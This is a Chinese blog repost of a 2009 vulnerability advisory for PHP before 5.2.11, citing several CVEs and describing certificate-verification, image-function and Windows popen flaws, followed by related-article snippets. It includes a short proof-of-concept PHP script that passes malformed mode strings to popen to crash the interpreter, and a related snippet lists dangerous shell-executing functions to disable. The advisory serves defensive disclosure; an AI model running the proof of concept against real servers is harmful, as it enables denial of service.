PHP 5.2.11版本修复多个安全漏洞

最新推荐文章于 2023-08-10 14:15:26 发布
最新推荐文章于 2023-08-10 14:15:26 发布
阅读量202 收藏
点赞数
文章标签: php 操作系统
原文链接:http://blog.51cto.com/lujiang/205475
版权 
BUGTRAQ  ID: 36449
CVE ID: CVE-2009-3291,CVE-2009-3292,CVE-2009-3293,CVE-2009-3294
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的5.2.11之前版本的多个函数中存在安全漏洞,可能允许远程***者导致拒绝服务或完全***用户系统。
1) PHP的php_openssl_apply_verification_policy函数没有正确的执行证书验证,可能允许***者通过伪造的证书执行欺骗***。
2) p_w_picpathcolortransparent函数没有正确的对颜色索引执行过滤检查。
3) 当运行在某些Windows操作系统上时,TSRM/tsrm_win32.c文件中的popen API函数允许***者通过第二个参数中的特制e或er字符串导致拒绝服务。
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有***性,仅供安全研究与教学之用,风险自负! 
<?php
$t1 = popen("echo hello", "e");
pclose($t1);
$t2 = popen("echo hello", "re");
pclose($t2);
$t3 = popen("echo hello", "er");
pclose($t3);
?>

转载于:https://blog.51cto.com/lujiang/205475

weixin_34348174
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php漏洞大全
03-09
PHP网页的安全性问题   针对PHP的网站主要存在下面几种攻击方式:   1.命令注入(Command Injection)   2.eval注入(Eval Injection)   3.客户端脚本攻击(script Insertion)   4.跨网站脚本攻击(Cross Site scripting, XSS)   5.SQL注入攻击(SQL injection)   6.跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)   7.Session 会话劫持(Session Hijacking)   8.Session 固定攻击(Session Fixation)   9.HTTP响应拆分攻击(HTTP Response Splitting)   10.文件上传漏洞(File Upload Attack)   11.目录穿越漏洞(Directory Traversal)   12.远程文件包含攻击(Remote Inclusion)   13.动态函数注入攻击(Dynamic Variable Evaluation)   14.URL攻击(URL attack)   15.表单提交欺骗攻击(Spoofed Form Submissions)   16.HTTP请求欺骗攻击(Spoofed HTTP Requests)   几个重要的php.ini选项
PHP多个版本爆出远程DOS漏洞
weixin_30677475的博客
03-26 151
近日,php多个版本爆出远程DoS漏洞(官方编号69364),利用该漏洞构造poc发起链接,很容易导致目标主机cpu的100%占用率,绿盟科技威胁响应中心随即启动应急机制, 启动应急响应工作,总结PHP漏洞要点,并制定了一系列防护方案。   受此漏洞影响的软件及系统包括PHP版本有:   • PHP 5.0.0 - 5.0.5   • PHP 5.1.0 - 5.1.6   • PHP ...
网管注意 PHP 5.2.5之前版本多个安全漏洞.
cjqbk811121的博客
07-30 319
受影响系统: PHP PHP < 5.2.5 不受影响系统: PHP PHP 5.2.5 描述: BUGTRAQ ID: 26403 ----CVE(CAN) ID: CVE-2007-4887 ...
php5.2.6 漏洞,PHP 5.2.6 (error_log) safe_mode bypass
weixin_42501881的博客
04-09 364
[ PHP 5.2.6 (error_log) safe_mode bypass ]Author: Maksymilian ArciemowiczDate:- - Written: 10.11.2008- - Public: 20.11.2008CWE: CWE-264Risk: Medium- --- 0.Description ---PHP is an HTML-embedded script...
php5.2.11+5.3.1+5.3.2
07-05
版本修复了一些已知的安全漏洞,确保了代码的执行安全。 在实际开发中,选择合适的PHP版本至关重要。PHP 5.2.x版本因其稳定性而受到很多用户的青睐,而5.3.x版本则引入了许多现代特性,为开发更复杂的应用程序...
php-5.2.11.tar.gz
11-12
5.2.11作为该系列的一个稳定版本修复了大量的bug,增强了整体的稳定性,为开发者提供了更为可靠的运行环境。 1. **面向对象编程加强**: PHP 5.2引入了完善的面向对象编程(OOP)支持,如类、对象、继承、接口、...
Symfony 高性能php框架 v5.2.11.zip
最新发布
04-02
v5.2.11是该框架的一个稳定版本,提供了许多优化和改进,以提升开发效率和应用性能。 首先,Symfony框架的核心特性包括组件化设计,这意味着它由一系列独立的、可重用的PHP库组成。开发者可以根据需求选择使用哪些...
angularjs Web页面框架 v5.2.11
10-12
Angular JS (Angular.JS) 是一组用来开发Web页面的框架、模板以及数据绑定和丰富UI组件。它支持整个开发进程,提供web应用的架构,无需进行手工DOM操作。 AngularJS很小,只有60K,兼容主流浏
php代码审计,php漏洞详解
qq_47289634的博客
08-10 1387
HTTP 响应拆分是由于攻击者经过精心设计利用电子邮件或者链接,让目标用户利用一个请求产生两个响应,前一个响应是服务器的响应,而后一个则是攻击者设计的响应。此攻击之所以会发生,是因为 WEB程序将使用者的数据置于 HTTP 响应表头中,这些使用者的数据是有攻击者精心设计的。session 保存的是每个用户的个人数据,一般的 web 应用程序会使用session 来保存通过验证的用户 账号和密码。一旦获取到 session id,那么攻击者可以利用目标用户的身份来登录网站,获取目标用户的操作权限。
php漏洞集合
weixin_50683638的博客
10-11 2269
第三章 常见的php漏洞集合 1.sql注入漏洞 0x01 注入介绍 1.什么是sql注入 用户输入的参数被当成sql语句在数据库里执行,这就是sql注入漏洞 2.sql注入的危害 sql注入轻则获取数据库信息,重则获取服务器权限。 0x02 搭建sqli-labs靶机 0.介绍 SQLI-LABS是学习SQLI的平台 sqli-labs下载链接:https://github.com/Audi-1/sqli-labs 环境:phpstudy+windows10 1.创建网站(注意php版本选择5.6) 2
ThinkPHP框架漏洞总结
weixin_42345596的博客
08-25 3817
Thinkphp简介 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/U
php漏洞检测修复,PHPStudy漏洞自查与修复指导
weixin_33610261的博客
03-16 752
一、后门检测方法通过分析,后门代码存在于/ext/php_xmlrpc.dll模块中phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45phpStudy2016路径php/php-5.2.17/ext/php_xmlrpc.dllphp/php-5.4.45/ext/php_xmlrpc.dllphpStudy2018路径PHPTutorial/php...
如何修复php网站漏洞
网站漏洞修复专家
04-08 3781
近日,我们SINE安全对metinfo进行网站安全检测发现,metinfo米拓建站系统存在高危的sql注入漏洞,攻击者可以利用该漏洞对网站的代码进行sql注入攻击,伪造恶意的sql非法语句,对网站的数据库,以及后端服务器进行攻击,该metinfo漏洞影响版本较为广泛,metinfo6.1.0版本,metinfo 6.1.3版本,metinfo 6.2.0都会受到该网站漏洞的攻击。 metinfo...
PHP降低程序漏洞、隐藏版本
bjgaocp的博客
02-26 487
正式上线后可以禁止PHP这些函数降低PHP程序漏洞和网站被攻击的风险 vim /application/php/lib/php.ini disable_functions = phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open,proc_get_status PHP...
PHP注入漏洞(附代码,具体步骤)
gl620321的博客
08-01 1748
一、命令注入(敏感函数定向法) 1.概念: 在PHP脚本中,我们可以对输入进行注入攻击。什么是注入?注入即是通过利用无验证码变量构造特殊语句对服务器进行渗透。 注入的种类有很多,而不仅仅只是SQL Injection 2.分类 命令注入(Commend Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cro...
一个简单的PHP验证码和验证方法。
阿锋--专栏
12-20 499
img.php //文件头... header("Content-type: image/png"); //创建真彩色白纸 $im = @imagecreatetruecolor(50, 20) or die("建立图像失败"); //获取背景颜色 $background_color = imagecolorallocate($im, 255, 255, 255);
php5.6无法上传文件,PHP版本5.2,5.4.38~5.6.6)任意文件上传漏洞
weixin_36161071的博客
03-09 798
PHP任意文件上传漏洞(CVE-2015-2348)。通常情况下,php的开发者会对文件名后缀、文件类型(Content-Type)、Mime type、文件大小等进行检查来限制恶意php脚本的上传,但是攻击者可以利用该漏洞绕过这些限制,直接上传恶意的文件。### 漏洞详情该漏洞存在于php的move_uploaded_file()函数中,这个函数一般在上传文件时被使用,用途是将上传的文件移动到新...
Hibernate 5.2.11用户指南:全面升级与优化
Hibernate ORM 5.2.11.Final User Guide 是一个针对Hibernate 5.2.11版本的高级用户手册,它详细介绍了Hibernate ORM框架的各个方面,包括但不限于体系架构、领域模型设计、配置与优化等。此版本发布于2017年10月14...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值